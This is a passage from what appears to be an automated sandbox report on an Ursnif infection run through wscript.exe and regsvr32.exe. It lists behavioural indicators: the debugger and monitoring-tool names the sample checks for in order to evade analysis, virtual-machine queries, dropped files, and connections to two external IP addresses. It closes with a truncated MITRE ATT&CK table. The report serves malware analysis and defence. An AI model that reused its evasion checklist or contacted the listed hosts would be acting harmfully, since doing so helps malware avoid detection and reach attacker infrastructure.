            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXE@T
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE@
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXE@K
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE@=
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-4088
            Source: C:\Windows\System32\wscript.exe TID: 876Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1464Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D09673 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,5_2_04D09673
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: regsvr32.exe, 00000005.00000003.1982782088.000000000347C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn$
            Source: wscript.exe, 00000000.00000002.485399983.000001E408C31000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.1573770663.000000000349A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: regsvr32.exe, 00000005.00000003.1235956194.000000000347E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn-
            Source: regsvr32.exe, 00000005.00000003.1471328398.0000000003483000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn*
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E162123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,5_2_6E162123
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E19C49B mov eax, dword ptr fs:[00000030h]5_2_6E19C49B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E19BF3D push dword ptr fs:[00000030h]5_2_6E19BF3D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E19C333 mov eax, dword ptr fs:[00000030h]5_2_6E19C333
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E161EE4 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,5_2_6E161EE4

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: swatch.c.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 8.209.73.71 80Jump to behavior
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,5_2_6E1621F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D01ACF cpuid 5_2_04D01ACF
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E162123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,5_2_6E162123
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D01ACF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,5_2_04D01ACF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_6E1610C4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,5_2_6E1610C4
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation321Winlogon Helper DLLProcess Injection12Software Packing1Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesScripting121Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            External Remote ServicesExecution through API1Accessibility FeaturesPath InterceptionFile Deletion1Input CaptureSecurity Software Discovery231Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Drive-by CompromiseExploitation for Client Execution1System FirmwareDLL Search Order HijackingObfuscated Files or Information3Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
            Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessMasquerading11Account ManipulationSystem Information Discovery56Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion3Brute ForceVirtualization/Sandbox Evasion3Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
            Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Inject